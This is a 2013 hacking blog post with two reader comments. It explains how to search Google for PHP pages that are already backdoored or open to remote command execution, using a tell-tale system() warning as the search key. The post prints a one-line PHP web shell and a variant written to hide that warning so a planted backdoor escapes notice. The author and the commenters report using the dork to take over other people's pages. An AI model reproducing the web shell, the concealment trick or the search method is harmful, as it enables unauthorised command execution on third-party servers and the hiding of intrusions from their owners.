Our Feeds

Thursday, 28 February 2013

Ajith Kp

Dork for detect Pre-Backdoored/RCE web pages [PHP]

Guyzzz,

    Here I would like to introduce a trick+google dork for find Pre-Backdoored webpages and some RCE [Remote Command Execution] Enabled webpages. Many of hackers and programmers are not aware of this Error message that originates when backdooring or programming.

   Here a sample error message...



   Here the lame c0de I used for Backdoor/Code this page.

   <?php
   print system($_GET['cmd']);
   ?> 

  This above code will create a error message,
      "Warning: system() [function.system]: Cannot execute a blank command".

  This error message is our KEY to hunt RCE's in Backdoored  webpages and RCE vulnerable Web. Applications.

Here is screenshot of g00gl3 d0rk :p



  If you want hide this error message in your backdoored webpage use this code,

   <?php
   if(isset($_GET['cmd']))
   {
      print system($_GET['cmd']);
   }
   ?>
 
 
I got one Backdoored/RCE vulnerabled web page...


This is the Screenshot  after exploit this Backdoor/vulnerability...

   I hope you have enjoyed this article... Please write your reviews, comments & criticisms...

<<<<<<<<<< (C) _TERMINAL_CODERS_ (C) >>>>>>>>>>

2 comments

Write comments
Anonymous
AUTHOR
28 February 2013 at 08:55 delete

Nice article bozz. I got some RCE by usingg this dork.

Reply
avatar
Anonymous
AUTHOR
28 February 2013 at 09:00 delete

I have seen this error messages manytimes. But didn't know it is for RCE. Thanks dude.

Reply
avatar